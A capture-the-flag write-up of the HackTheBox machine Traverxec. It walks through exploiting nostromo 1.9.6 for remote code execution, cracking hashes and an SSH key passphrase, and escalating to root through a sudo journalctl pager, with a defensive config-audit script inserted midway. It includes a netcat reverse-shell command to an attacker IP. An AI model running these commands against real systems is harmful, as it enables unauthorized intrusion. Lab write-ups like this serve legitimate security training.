HackTheBox - Traverxec

Morten Hansen • January 30, 2022

Traverxec

IP 10.10.10.165

NMAP

22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC

Visiting http://10.10.10.165 in the browser we can enumerate a bit, and after tampering with the links we reach a 404 error page that identifies the web service as nostromo 1.9.6.

Searching Google for "nostromo 1.9.6 exploit" we find an exploit that gives RCE (Remote Code Execution): https://www.exploit-db.com/exploits/47837

#We set up a listener in our terminal 
nc -lnvp 9001

#run exploit
python2 47837.py 10.10.10.165 80 "nc -e /bin/sh 10.10.16.6 9001"

#The nc-command binds a reverse shell to our IP.

We get a shell as www-data, and by running cat /etc/passwd | grep bash we can see the list of users on the system with a login shell.

cat /etc/passwd | grep bash

root:x:0:0:root:/root:/bin/bash
david:x:1000:1000:david,,,:/home/david:/bin/bash

ls -la /home/ shows david as the only user. We are not permitted to read files inside david's home folder.

USER ESCALATION

Looking in the /var folder we find the directory /nostromo/conf. Inside the /var/nostromo/conf/.htpasswd file we find this hash: david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/. We can crack the hash with hashcat. We first copy out only the hash and run hashcat -a 0 -m 500 hash.file /usr/share/wordlists/rockyou.txt, which gives us the password Nowonly4me.

We try the password with ssh david@10.10.10.165 and get an error. Also inside /var/nostromo/conf we find the nhttpd.conf file.

#nhttpd.conf
servername              traverxec.htb
serverlisten            *
serveradmin             david@traverxec.htb
serverroot              /var/nostromo
servermimes             conf/mimes
docroot                 /var/nostromo/htdocs
docindex                index.html

# LOGS [OPTIONAL]
logpid                  logs/nhttpd.pid
# SETUID [RECOMMENDED]
user                    www-data
# BASIC AUTHENTICATION [OPTIONAL]
htaccess                .htaccess
htpasswd                /var/nostromo/conf/.htpasswd
# ALIASES [OPTIONAL]
/icons                  /var/nostromo/icons
# HOMEDIRS [OPTIONAL]
homedirs                /home
homedirs_public         public_www

After reading the nhttpd manual we see that the config file serves the public_www folder from each user's home directory under /home. Going to /home/david/public_www we find a new folder, protected-file-area, containing backup-ssh-identity-files.tgz.
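As an added defensive check (not part of the writeup), the following script parses an nhttpd.conf and its htpasswd file and flags the two settings that drove this box: homedirs exposure over HTTP and md5crypt ($1$) password hashes that crack quickly offline. The sample inputs are the config and hash shown above, embedded inline.

```python
"""Audit a nostromo nhttpd.conf and htpasswd for the weaknesses seen on Traverxec."""

# Constructed sample: the relevant lines of the nhttpd.conf from the writeup.
SAMPLE_CONF = """\
servername              traverxec.htb
serverroot              /var/nostromo
docroot                 /var/nostromo/htdocs
# SETUID [RECOMMENDED]
user                    www-data
# BASIC AUTHENTICATION [OPTIONAL]
htaccess                .htaccess
htpasswd                /var/nostromo/conf/.htpasswd
# HOMEDIRS [OPTIONAL]
homedirs                /home
homedirs_public         public_www
"""
# Constructed sample htpasswd content; the hash is the one found in the writeup.
SAMPLE_HTPASSWD = "david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/\n"

# crypt(3) schemes that are fast to brute-force; prefer sha512crypt ($6$) where
# the server's crypt(3) supports it.
WEAK_PREFIXES = {"$1$": "md5crypt", "$apr1$": "apr1 (MD5)"}


def parse_conf(text):
    """nhttpd.conf is 'key value' per line with '#' comments; return a dict."""
    conf = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        parts = line.split(None, 1)
        if len(parts) == 2:
            conf[parts[0]] = parts[1].strip()
    return conf


def audit(conf_text, htpasswd_text):
    """Return a list of finding strings; an empty list means nothing was flagged."""
    conf = parse_conf(conf_text)
    findings = []
    if "user" not in conf:
        findings.append("no 'user' directive: nhttpd keeps running as root")
    if "homedirs" in conf:
        pub = conf.get("homedirs_public", "")
        findings.append(f"homedirs enabled: {conf['homedirs']}/<user>/{pub} is served over HTTP")
    for line in htpasswd_text.splitlines():
        if ":" not in line:
            continue
        user, digest = line.split(":", 1)
        for prefix, name in WEAK_PREFIXES.items():
            if digest.startswith(prefix):
                findings.append(f"htpasswd user '{user}' uses {name}; rehash with a slower scheme")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_CONF, SAMPLE_HTPASSWD):
        print("FINDING:", finding)
```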

When extracting the archive we get a new folder that contains a .ssh directory with a password-protected key file. We crack it using john. We locate ssh2john and extract the hash to a new file. We then run john hash -w /usr/share/wordlists/rockyou.txt --format=ssh and get the password hunter.

With SSH we specify the extracted key file (with -i) and, when prompted, give hunter as the password. This lets us into the server as david.

Inside david's home folder there is a bin folder with a script file.

file: server-stats.sh

#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

We see that the script runs /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat, which tells us that this command is allowed in the sudoers file. We experiment a bit and find out that we can run sudo journalctl -n5 -unostromo.service without being prompted for the user's password, which we do not know.

Trying sudo -l asks for a password, so we can't use it. Typing the command sudo journalctl -n5 -unostromo.service gives us the journalctl output in a special form: it is displayed in a pager that resembles the more or less text viewers.

Searching GTFOBins we see that we can run !/bin/sh inside the pager; we keep the elevated permissions and get a root shell.